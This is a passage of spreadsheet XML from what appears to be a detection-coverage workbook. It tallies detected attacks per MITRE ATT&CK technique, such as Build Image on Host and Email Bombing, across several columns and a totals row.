      <c r="BP73" s="322">
        <v>2</v>
      </c>
      <c r="BQ73" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="BR73" s="12">
        <v>0</v>
      </c>
      <c r="BS73" s="12">
        <v>2</v>
      </c>
      <c r="BT73" s="13">
        <v>1</v>
      </c>
      <c r="BU73" s="394">
        <v>1</v>
      </c>
      <c r="BV73" s="292">
        <v>0</v>
      </c>
      <c r="BW73" s="322">
        <v>0</v>
      </c>
      <c r="BX73" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY73" s="12">
        <v>0</v>
      </c>
      <c r="BZ73" s="13">
        <v>0</v>
      </c>
      <c r="CA73" s="394">
        <v>0</v>
      </c>
      <c r="CB73" s="292">
        <v>0</v>
      </c>
      <c r="CC73" s="322">
        <v>0</v>
      </c>
      <c r="CD73" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE73" s="12">
        <v>0</v>
      </c>
      <c r="CF73" s="12">
        <v>0</v>
      </c>
      <c r="CG73" s="13">
        <v>0</v>
      </c>
      <c r="CH73" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:98" ht="15" customHeight="1">
      <c r="A74" s="4">
        <f t="shared" si="10"/>
        <v>72</v>
      </c>
      <c r="B74" s="4" t="str">
        <f>IFERROR(VLOOKUP(A74,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1612</v>
      </c>
      <c r="C74" s="4" t="str">
        <f>IFERROR(VLOOKUP(B74,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Build Image on Host</v>
      </c>
      <c r="D74" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B74)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>188</v>
      </c>
      <c r="F74" s="286" t="str">
        <f t="shared" si="11"/>
        <v>2 (188)</v>
      </c>
      <c r="G74" s="292"/>
      <c r="H74" s="322"/>
      <c r="I74" s="322"/>
      <c r="J74" s="12"/>
      <c r="K74" s="13"/>
      <c r="L74" s="394"/>
      <c r="M74" s="322"/>
      <c r="N74" s="322"/>
      <c r="O74" s="322"/>
      <c r="P74" s="12"/>
      <c r="Q74" s="13"/>
      <c r="R74" s="394"/>
      <c r="S74" s="292"/>
      <c r="T74" s="322"/>
      <c r="U74" s="322"/>
      <c r="V74" s="12"/>
      <c r="W74" s="13"/>
      <c r="X74" s="394"/>
      <c r="Y74" s="392"/>
      <c r="Z74" s="392"/>
      <c r="AA74" s="322"/>
      <c r="AB74" s="392"/>
      <c r="AC74" s="16"/>
      <c r="AD74" s="394"/>
      <c r="AE74" s="392"/>
      <c r="AF74" s="392"/>
      <c r="AG74" s="322"/>
      <c r="AH74" s="392"/>
      <c r="AI74" s="16"/>
      <c r="AJ74" s="394"/>
      <c r="AK74" s="392"/>
      <c r="AL74" s="392"/>
      <c r="AM74" s="322"/>
      <c r="AN74" s="392"/>
      <c r="AO74" s="16"/>
      <c r="AP74" s="394"/>
      <c r="AQ74" s="292"/>
      <c r="AR74" s="322"/>
      <c r="AS74" s="322"/>
      <c r="AT74" s="12"/>
      <c r="AU74" s="13"/>
      <c r="AV74" s="394"/>
      <c r="AW74" s="392"/>
      <c r="AX74" s="392"/>
      <c r="AY74" s="322"/>
      <c r="BA74" s="16"/>
      <c r="BB74" s="394"/>
      <c r="BC74" s="292"/>
      <c r="BD74" s="322"/>
      <c r="BE74" s="322"/>
      <c r="BF74" s="12"/>
      <c r="BG74" s="13"/>
      <c r="BH74" s="394"/>
      <c r="BI74" s="292">
        <v>20</v>
      </c>
      <c r="BJ74" s="322">
        <v>4</v>
      </c>
      <c r="BK74" s="322" t="str">
        <f t="shared" si="6"/>
        <v>4 (20)</v>
      </c>
      <c r="BL74" s="12">
        <v>1</v>
      </c>
      <c r="BM74" s="13">
        <v>0.5</v>
      </c>
      <c r="BN74" s="394">
        <v>4</v>
      </c>
      <c r="BO74" s="292">
        <v>161</v>
      </c>
      <c r="BP74" s="322">
        <v>145</v>
      </c>
      <c r="BQ74" s="322" t="str">
        <f t="shared" si="7"/>
        <v>145 (161)</v>
      </c>
      <c r="BR74" s="12">
        <v>1</v>
      </c>
      <c r="BS74" s="12">
        <v>5</v>
      </c>
      <c r="BT74" s="13">
        <v>1</v>
      </c>
      <c r="BU74" s="394">
        <v>143</v>
      </c>
      <c r="BV74" s="292">
        <v>2</v>
      </c>
      <c r="BW74" s="322">
        <v>2</v>
      </c>
      <c r="BX74" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BY74" s="12">
        <v>2</v>
      </c>
      <c r="BZ74" s="13">
        <v>0.5</v>
      </c>
      <c r="CA74" s="394">
        <v>1</v>
      </c>
      <c r="CB74" s="292">
        <v>2</v>
      </c>
      <c r="CC74" s="322">
        <v>2</v>
      </c>
      <c r="CD74" s="322" t="s">
        <v>4742</v>
      </c>
      <c r="CE74" s="12">
        <v>2</v>
      </c>
      <c r="CF74" s="12">
        <v>0</v>
      </c>
      <c r="CG74" s="13">
        <v>0.5</v>
      </c>
      <c r="CH74" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:98" ht="15" customHeight="1">
      <c r="A75" s="4">
        <f t="shared" si="10"/>
        <v>73</v>
      </c>
      <c r="B75" s="4" t="str">
        <f>IFERROR(VLOOKUP(A75,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1615</v>
      </c>
      <c r="C75" s="4" t="str">
        <f>IFERROR(VLOOKUP(B75,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Group Policy Discovery</v>
      </c>
      <c r="D75" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B75)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>53</v>
      </c>
      <c r="F75" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (53)</v>
      </c>
      <c r="G75" s="292"/>
      <c r="H75" s="322"/>
      <c r="I75" s="322"/>
      <c r="J75" s="12"/>
      <c r="K75" s="13"/>
      <c r="L75" s="394"/>
      <c r="M75" s="322"/>
      <c r="N75" s="322"/>
      <c r="O75" s="322"/>
      <c r="P75" s="12"/>
      <c r="Q75" s="13"/>
      <c r="R75" s="394"/>
      <c r="S75" s="292"/>
      <c r="T75" s="322"/>
      <c r="U75" s="322"/>
      <c r="V75" s="12"/>
      <c r="W75" s="13"/>
      <c r="X75" s="394"/>
      <c r="Y75" s="392"/>
      <c r="Z75" s="392"/>
      <c r="AA75" s="322"/>
      <c r="AB75" s="392"/>
      <c r="AC75" s="16"/>
      <c r="AD75" s="394"/>
      <c r="AE75" s="392"/>
      <c r="AF75" s="392"/>
      <c r="AG75" s="322"/>
      <c r="AH75" s="392"/>
      <c r="AI75" s="16"/>
      <c r="AJ75" s="394"/>
      <c r="AK75" s="392"/>
      <c r="AL75" s="392"/>
      <c r="AM75" s="322"/>
      <c r="AN75" s="392"/>
      <c r="AO75" s="16"/>
      <c r="AP75" s="394"/>
      <c r="AQ75" s="292"/>
      <c r="AR75" s="322"/>
      <c r="AS75" s="322"/>
      <c r="AT75" s="12"/>
      <c r="AU75" s="13"/>
      <c r="AV75" s="394"/>
      <c r="AW75" s="392"/>
      <c r="AX75" s="392"/>
      <c r="AY75" s="322"/>
      <c r="BA75" s="16"/>
      <c r="BB75" s="394"/>
      <c r="BC75" s="292"/>
      <c r="BD75" s="322"/>
      <c r="BE75" s="322"/>
      <c r="BF75" s="12"/>
      <c r="BG75" s="13"/>
      <c r="BH75" s="394"/>
      <c r="BI75" s="292">
        <v>0</v>
      </c>
      <c r="BJ75" s="322">
        <v>0</v>
      </c>
      <c r="BK75" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL75" s="12">
        <v>0</v>
      </c>
      <c r="BM75" s="13">
        <v>0</v>
      </c>
      <c r="BN75" s="394">
        <v>0</v>
      </c>
      <c r="BO75" s="292">
        <v>49</v>
      </c>
      <c r="BP75" s="322">
        <v>49</v>
      </c>
      <c r="BQ75" s="322" t="str">
        <f t="shared" si="7"/>
        <v>49 (49)</v>
      </c>
      <c r="BR75" s="12">
        <v>0</v>
      </c>
      <c r="BS75" s="12">
        <v>6</v>
      </c>
      <c r="BT75" s="13">
        <v>1</v>
      </c>
      <c r="BU75" s="394">
        <v>49</v>
      </c>
      <c r="BV75" s="292">
        <v>0</v>
      </c>
      <c r="BW75" s="322">
        <v>0</v>
      </c>
      <c r="BX75" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY75" s="12">
        <v>0</v>
      </c>
      <c r="BZ75" s="13">
        <v>0</v>
      </c>
      <c r="CA75" s="394">
        <v>0</v>
      </c>
      <c r="CB75" s="292">
        <v>0</v>
      </c>
      <c r="CC75" s="322">
        <v>0</v>
      </c>
      <c r="CD75" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE75" s="12">
        <v>0</v>
      </c>
      <c r="CF75" s="12">
        <v>0</v>
      </c>
      <c r="CG75" s="13">
        <v>0</v>
      </c>
      <c r="CH75" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:98" ht="15" customHeight="1">
      <c r="A76" s="4">
        <f t="shared" si="10"/>
        <v>74</v>
      </c>
      <c r="B76" s="4" t="str">
        <f>IFERROR(VLOOKUP(A76,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1659</v>
      </c>
      <c r="C76" s="4" t="str">
        <f>IFERROR(VLOOKUP(B76,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Content Injection</v>
      </c>
      <c r="D76" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B76)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>89</v>
      </c>
      <c r="F76" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (89)</v>
      </c>
      <c r="G76" s="292"/>
      <c r="H76" s="322"/>
      <c r="I76" s="322"/>
      <c r="J76" s="12"/>
      <c r="K76" s="13"/>
      <c r="L76" s="394"/>
      <c r="M76" s="322"/>
      <c r="N76" s="322"/>
      <c r="O76" s="322"/>
      <c r="P76" s="12"/>
      <c r="Q76" s="13"/>
      <c r="R76" s="394"/>
      <c r="S76" s="292"/>
      <c r="T76" s="322"/>
      <c r="U76" s="322"/>
      <c r="V76" s="12"/>
      <c r="W76" s="13"/>
      <c r="X76" s="394"/>
      <c r="Y76" s="392"/>
      <c r="Z76" s="392"/>
      <c r="AA76" s="322"/>
      <c r="AB76" s="392"/>
      <c r="AC76" s="16"/>
      <c r="AD76" s="394"/>
      <c r="AE76" s="392"/>
      <c r="AF76" s="392"/>
      <c r="AG76" s="322"/>
      <c r="AH76" s="392"/>
      <c r="AI76" s="16"/>
      <c r="AJ76" s="394"/>
      <c r="AK76" s="392"/>
      <c r="AL76" s="392"/>
      <c r="AM76" s="322"/>
      <c r="AN76" s="392"/>
      <c r="AO76" s="16"/>
      <c r="AP76" s="394"/>
      <c r="AQ76" s="292"/>
      <c r="AR76" s="322"/>
      <c r="AS76" s="322"/>
      <c r="AT76" s="12"/>
      <c r="AU76" s="13"/>
      <c r="AV76" s="394"/>
      <c r="AW76" s="392"/>
      <c r="AX76" s="392"/>
      <c r="AY76" s="322"/>
      <c r="BA76" s="16"/>
      <c r="BB76" s="394"/>
      <c r="BC76" s="292"/>
      <c r="BD76" s="322"/>
      <c r="BE76" s="322"/>
      <c r="BF76" s="12"/>
      <c r="BG76" s="13"/>
      <c r="BH76" s="394"/>
      <c r="BI76" s="292">
        <v>2</v>
      </c>
      <c r="BJ76" s="322">
        <v>1</v>
      </c>
      <c r="BK76" s="322" t="str">
        <f t="shared" si="6"/>
        <v>1 (2)</v>
      </c>
      <c r="BL76" s="12">
        <v>1</v>
      </c>
      <c r="BM76" s="13">
        <v>1</v>
      </c>
      <c r="BN76" s="394">
        <v>1</v>
      </c>
      <c r="BO76" s="292">
        <v>93</v>
      </c>
      <c r="BP76" s="322">
        <v>86</v>
      </c>
      <c r="BQ76" s="322" t="str">
        <f t="shared" si="7"/>
        <v>86 (93)</v>
      </c>
      <c r="BR76" s="12">
        <v>1</v>
      </c>
      <c r="BS76" s="12">
        <v>11</v>
      </c>
      <c r="BT76" s="13">
        <v>1</v>
      </c>
      <c r="BU76" s="394">
        <v>86</v>
      </c>
      <c r="BV76" s="292">
        <v>0</v>
      </c>
      <c r="BW76" s="322">
        <v>0</v>
      </c>
      <c r="BX76" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY76" s="12">
        <v>0</v>
      </c>
      <c r="BZ76" s="13">
        <v>0</v>
      </c>
      <c r="CA76" s="394">
        <v>0</v>
      </c>
      <c r="CB76" s="292">
        <v>0</v>
      </c>
      <c r="CC76" s="322">
        <v>0</v>
      </c>
      <c r="CD76" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE76" s="12">
        <v>0</v>
      </c>
      <c r="CF76" s="12">
        <v>0</v>
      </c>
      <c r="CG76" s="13">
        <v>0</v>
      </c>
      <c r="CH76" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:98" ht="15" customHeight="1">
      <c r="A77" s="4">
        <f t="shared" si="10"/>
        <v>75</v>
      </c>
      <c r="B77" s="4" t="str">
        <f>IFERROR(VLOOKUP(A77,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1665</v>
      </c>
      <c r="C77" s="4" t="str">
        <f>IFERROR(VLOOKUP(B77,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hide Infrastructure</v>
      </c>
      <c r="D77" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B77)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F77" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (12)</v>
      </c>
      <c r="G77" s="292"/>
      <c r="H77" s="322"/>
      <c r="I77" s="322"/>
      <c r="J77" s="12"/>
      <c r="K77" s="13"/>
      <c r="L77" s="394"/>
      <c r="M77" s="322"/>
      <c r="N77" s="322"/>
      <c r="O77" s="322"/>
      <c r="P77" s="12"/>
      <c r="Q77" s="13"/>
      <c r="R77" s="394"/>
      <c r="S77" s="292"/>
      <c r="T77" s="322"/>
      <c r="U77" s="322"/>
      <c r="V77" s="12"/>
      <c r="W77" s="13"/>
      <c r="X77" s="394"/>
      <c r="Y77" s="392"/>
      <c r="Z77" s="392"/>
      <c r="AA77" s="322"/>
      <c r="AB77" s="392"/>
      <c r="AC77" s="16"/>
      <c r="AD77" s="394"/>
      <c r="AE77" s="392"/>
      <c r="AF77" s="392"/>
      <c r="AG77" s="322"/>
      <c r="AH77" s="392"/>
      <c r="AI77" s="16"/>
      <c r="AJ77" s="394"/>
      <c r="AK77" s="392"/>
      <c r="AL77" s="392"/>
      <c r="AM77" s="322"/>
      <c r="AN77" s="392"/>
      <c r="AO77" s="16"/>
      <c r="AP77" s="394"/>
      <c r="AQ77" s="292"/>
      <c r="AR77" s="322"/>
      <c r="AS77" s="322"/>
      <c r="AT77" s="12"/>
      <c r="AU77" s="13"/>
      <c r="AV77" s="394"/>
      <c r="AW77" s="392"/>
      <c r="AX77" s="392"/>
      <c r="AY77" s="322"/>
      <c r="BA77" s="16"/>
      <c r="BB77" s="394"/>
      <c r="BC77" s="292"/>
      <c r="BD77" s="322"/>
      <c r="BE77" s="322"/>
      <c r="BF77" s="12"/>
      <c r="BG77" s="13"/>
      <c r="BH77" s="394"/>
      <c r="BI77" s="292">
        <v>6</v>
      </c>
      <c r="BJ77" s="322">
        <v>2</v>
      </c>
      <c r="BK77" s="322" t="str">
        <f t="shared" si="6"/>
        <v>2 (6)</v>
      </c>
      <c r="BL77" s="12">
        <v>1</v>
      </c>
      <c r="BM77" s="13">
        <v>1</v>
      </c>
      <c r="BN77" s="394">
        <v>2</v>
      </c>
      <c r="BO77" s="292">
        <v>16</v>
      </c>
      <c r="BP77" s="322">
        <v>12</v>
      </c>
      <c r="BQ77" s="322" t="str">
        <f t="shared" si="7"/>
        <v>12 (16)</v>
      </c>
      <c r="BR77" s="12">
        <v>1</v>
      </c>
      <c r="BS77" s="12">
        <v>5</v>
      </c>
      <c r="BT77" s="13">
        <v>1</v>
      </c>
      <c r="BU77" s="394">
        <v>10</v>
      </c>
      <c r="BV77" s="292">
        <v>0</v>
      </c>
      <c r="BW77" s="322">
        <v>0</v>
      </c>
      <c r="BX77" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY77" s="12">
        <v>0</v>
      </c>
      <c r="BZ77" s="13">
        <v>0</v>
      </c>
      <c r="CA77" s="394">
        <v>0</v>
      </c>
      <c r="CB77" s="292">
        <v>0</v>
      </c>
      <c r="CC77" s="322">
        <v>0</v>
      </c>
      <c r="CD77" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE77" s="12">
        <v>0</v>
      </c>
      <c r="CF77" s="12">
        <v>0</v>
      </c>
      <c r="CG77" s="13">
        <v>0</v>
      </c>
      <c r="CH77" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:98" ht="15" customHeight="1">
      <c r="A78" s="4">
        <f t="shared" si="10"/>
        <v>76</v>
      </c>
      <c r="B78" s="4" t="str">
        <f>IFERROR(VLOOKUP(A78,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1667</v>
      </c>
      <c r="C78" s="493" t="str">
        <f>IFERROR(VLOOKUP(B78,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Bombing</v>
      </c>
      <c r="D78" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B78)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>100</v>
      </c>
      <c r="F78" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (100)</v>
      </c>
      <c r="G78" s="292"/>
      <c r="H78" s="322"/>
      <c r="I78" s="322"/>
      <c r="J78" s="12"/>
      <c r="K78" s="13"/>
      <c r="L78" s="394"/>
      <c r="M78" s="322"/>
      <c r="N78" s="322"/>
      <c r="O78" s="322"/>
      <c r="P78" s="12"/>
      <c r="Q78" s="13"/>
      <c r="R78" s="394"/>
      <c r="S78" s="292"/>
      <c r="T78" s="322"/>
      <c r="U78" s="322"/>
      <c r="V78" s="12"/>
      <c r="W78" s="13"/>
      <c r="X78" s="394"/>
      <c r="Y78" s="392"/>
      <c r="Z78" s="392"/>
      <c r="AA78" s="322"/>
      <c r="AB78" s="392"/>
      <c r="AC78" s="16"/>
      <c r="AD78" s="394"/>
      <c r="AE78" s="392"/>
      <c r="AF78" s="392"/>
      <c r="AG78" s="322"/>
      <c r="AH78" s="392"/>
      <c r="AI78" s="16"/>
      <c r="AJ78" s="394"/>
      <c r="AK78" s="392"/>
      <c r="AL78" s="392"/>
      <c r="AM78" s="322"/>
      <c r="AN78" s="392"/>
      <c r="AO78" s="16"/>
      <c r="AP78" s="394"/>
      <c r="AQ78" s="292"/>
      <c r="AR78" s="322"/>
      <c r="AS78" s="322"/>
      <c r="AT78" s="12"/>
      <c r="AU78" s="13"/>
      <c r="AV78" s="394"/>
      <c r="AW78" s="392"/>
      <c r="AX78" s="392"/>
      <c r="AY78" s="322"/>
      <c r="BA78" s="16"/>
      <c r="BB78" s="394"/>
      <c r="BC78" s="292"/>
      <c r="BD78" s="322"/>
      <c r="BE78" s="322"/>
      <c r="BF78" s="12"/>
      <c r="BG78" s="13"/>
      <c r="BH78" s="394"/>
      <c r="BI78" s="292">
        <v>0</v>
      </c>
      <c r="BJ78" s="322">
        <v>0</v>
      </c>
      <c r="BK78" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL78" s="12">
        <v>0</v>
      </c>
      <c r="BM78" s="13">
        <v>0</v>
      </c>
      <c r="BN78" s="394">
        <v>0</v>
      </c>
      <c r="BO78" s="292">
        <v>0</v>
      </c>
      <c r="BP78" s="322">
        <v>0</v>
      </c>
      <c r="BQ78" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="BR78" s="12">
        <v>0</v>
      </c>
      <c r="BS78" s="12">
        <v>0</v>
      </c>
      <c r="BT78" s="13">
        <v>0</v>
      </c>
      <c r="BU78" s="394">
        <v>0</v>
      </c>
      <c r="BV78" s="292">
        <v>0</v>
      </c>
      <c r="BW78" s="322">
        <v>0</v>
      </c>
      <c r="BX78" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY78" s="12">
        <v>0</v>
      </c>
      <c r="BZ78" s="13">
        <v>0</v>
      </c>
      <c r="CA78" s="394">
        <v>0</v>
      </c>
      <c r="CB78" s="292">
        <v>0</v>
      </c>
      <c r="CC78" s="322">
        <v>0</v>
      </c>
      <c r="CD78" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE78" s="12">
        <v>0</v>
      </c>
      <c r="CF78" s="12">
        <v>0</v>
      </c>
      <c r="CG78" s="13">
        <v>0</v>
      </c>
      <c r="CH78" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:98" s="4" customFormat="1" ht="15" customHeight="1">
      <c r="A79" s="660" t="s">
        <v>176</v>
      </c>
      <c r="B79" s="661"/>
      <c r="C79" s="662"/>
      <c r="D79" s="11">
        <f>SUM(D3:D78)</f>
        <v>110</v>
      </c>
      <c r="E79" s="11">
        <f>SUM(E3:E78)</f>
        <v>3573695</v>
      </c>
      <c r="F79" s="580" t="str">
        <f>D79&amp;" ("&amp;E79&amp;")"</f>
        <v>110 (3573695)</v>
      </c>
      <c r="G79" s="289">
        <f>SUM(G3:G78)</f>
        <v>0</v>
      </c>
      <c r="H79" s="581">
        <f>SUM(H3:H78)</f>
        <v>0</v>
      </c>
      <c r="I79" s="581"/>
      <c r="J79" s="11">
        <f>SUMPRODUCT($D3:$D$78,J3:J78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="K79" s="14">
        <f>SUM(K$3:K$78)</f>
        <v>0</v>
      </c>
      <c r="L79" s="395">
        <f>SUM(L$3:L$78)</f>
        <v>0</v>
      </c>
      <c r="M79" s="581">
        <f>SUM(M3:M78)</f>
        <v>0</v>
      </c>
      <c r="N79" s="581">
        <f>SUM(N3:N78)</f>
        <v>0</v>
      </c>
      <c r="O79" s="581"/>
      <c r="P79" s="11">
        <f>SUMPRODUCT($D3:$D$78,P3:P78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="Q79" s="14">
        <f>SUM(Q$3:Q$78)</f>
        <v>0</v>
      </c>
      <c r="R79" s="290">
        <f>SUM(R$3:R$78)</f>
        <v>0</v>
      </c>
      <c r="S79" s="289">
        <f>SUM(S3:S78)</f>
        <v>0</v>
      </c>
      <c r="T79" s="581">
        <f>SUM(T3:T78)</f>
        <v>0</v>
      </c>
      <c r="U79" s="581"/>
      <c r="V79" s="11">
        <f>SUMPRODUCT($D3:$D$78,V3:V78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="W79" s="14">
        <f>SUM(W$3:W$78)</f>
        <v>0</v>
      </c>
      <c r="X79" s="395">
        <f>SUM(X$3:X$78)</f>
        <v>0</v>
      </c>
      <c r="Y79" s="581">
        <f>SUM(Y3:Y78)</f>
        <v>0</v>
      </c>
      <c r="Z79" s="581">
        <f>SUM(Z3:Z78)</f>
        <v>0</v>
      </c>
      <c r="AA79" s="581"/>
      <c r="AB79" s="11">
        <f>SUMPRODUCT($D3:$D$78,AB3:AB78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="AC79" s="14">
        <f>SUM(AC$3:AC$78)</f>
        <v>0</v>
      </c>
      <c r="AD79" s="290">
        <f>SUM(AD$3:AD$78)</f>
        <v>0</v>
      </c>
      <c r="AE79" s="289">
        <f>SUM(AE3:AE78)</f>
        <v>0</v>
      </c>
      <c r="AF79" s="581">
        <f>SUM(AF3:AF78)</f>
        <v>0</v>
      </c>
      <c r="AG79" s="581"/>
      <c r="AH79" s="11">
        <f>SUMPRODUCT($D3:$D$78,AH3:AH78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="AI79" s="14">
        <f>SUM(AI$3:AI$78)</f>
        <v>0</v>
      </c>
      <c r="AJ79" s="395">
        <f>SUM(AJ$3:AJ$78)</f>
        <v>0</v>
      </c>
      <c r="AK79" s="581">
        <f>SUM(AK3:AK78)</f>
        <v>0</v>
      </c>
      <c r="AL79" s="581">
        <f>SUM(AL3:AL78)</f>
        <v>0</v>
      </c>
      <c r="AM79" s="581"/>
      <c r="AN79" s="11">
        <f>SUMPRODUCT($D3:$D$78,AN3:AN78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="AO79" s="14">
        <f>SUM(AO$3:AO$78)</f>
        <v>0</v>
      </c>
      <c r="AP79" s="290">
        <f>SUM(AP$3:AP$78)</f>
        <v>0</v>
      </c>
      <c r="AQ79" s="289">
        <f>SUM(AQ3:AQ78)</f>
        <v>0</v>
      </c>
      <c r="AR79" s="581">
        <f>SUM(AR3:AR78)</f>
        <v>0</v>
      </c>
      <c r="AS79" s="581"/>
      <c r="AT79" s="11">
        <f>SUMPRODUCT($D3:$D$78,AT3:AT78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="AU79" s="14">
        <f>SUM(AU$3:AU$78)</f>
        <v>0</v>
      </c>
      <c r="AV79" s="395">
        <f>SUM(AV$3:AV$78)</f>
        <v>0</v>
      </c>
      <c r="AW79" s="581">
        <f>SUM(AW3:AW78)</f>
        <v>0</v>
      </c>
      <c r="AX79" s="581">
        <f>SUM(AX3:AX78)</f>
        <v>0</v>
      </c>
      <c r="AY79" s="581"/>
      <c r="AZ79" s="11">
        <f>SUMPRODUCT($D3:$D$78,AZ3:AZ78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="BA79" s="14">
        <f>SUM(BA$3:BA$78)</f>
        <v>0</v>
      </c>
      <c r="BB79" s="290">
        <f>SUM(BB$3:BB$78)</f>
        <v>0</v>
      </c>
      <c r="BC79" s="289">
        <f>SUM(BC3:BC78)</f>
        <v>0</v>
      </c>
      <c r="BD79" s="581">
        <f>SUM(BD3:BD78)</f>
        <v>0</v>
      </c>
      <c r="BE79" s="581"/>
      <c r="BF79" s="11">
        <f>SUMPRODUCT($D3:$D$78,BF3:BF78)/$D$79</f>
        <v>0</v>
      </c>
      <c r="BG79" s="14">
        <f>SUM(BG$3:BG$78)</f>
        <v>0</v>
      </c>
      <c r="BH79" s="395">
        <f>SUM(BH$3:BH$78)</f>
        <v>0</v>
      </c>
      <c r="BI79" s="289">
        <f>SUM(BI3:BI78)</f>
        <v>86</v>
      </c>
      <c r="BJ79" s="581">
        <f>SUM(BJ3:BJ78)</f>
        <v>45</v>
      </c>
      <c r="BK79" s="581" t="str">
        <f t="shared" ref="BK79" si="12">BJ79 &amp; " (" &amp; BI79 &amp; ")"</f>
        <v>45 (86)</v>
      </c>
      <c r="BL79" s="11">
        <f>SUM(BL3:BL78)</f>
        <v>30</v>
      </c>
      <c r="BM79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BM3:BM78)/$D$79</f>
        <v>0.2</v>
      </c>
      <c r="BN79" s="290">
        <f>SUM(BN$3:BN$78)</f>
        <v>40</v>
      </c>
      <c r="BO79" s="289">
        <f>SUM(BO3:BO78)</f>
        <v>353816</v>
      </c>
      <c r="BP79" s="581">
        <f>SUM(BP3:BP78)</f>
        <v>342838</v>
      </c>
      <c r="BQ79" s="581" t="str">
        <f t="shared" ref="BQ79" si="13">BP79 &amp; " (" &amp; BO79 &amp; ")"</f>
        <v>342838 (353816)</v>
      </c>
      <c r="BR79" s="11">
        <f>SUM(BR3:BR78)</f>
        <v>30</v>
      </c>
      <c r="BS79" s="11">
        <f>SUM(BS3:BS78)</f>
        <v>234</v>
      </c>
      <c r="BT79" s="472">
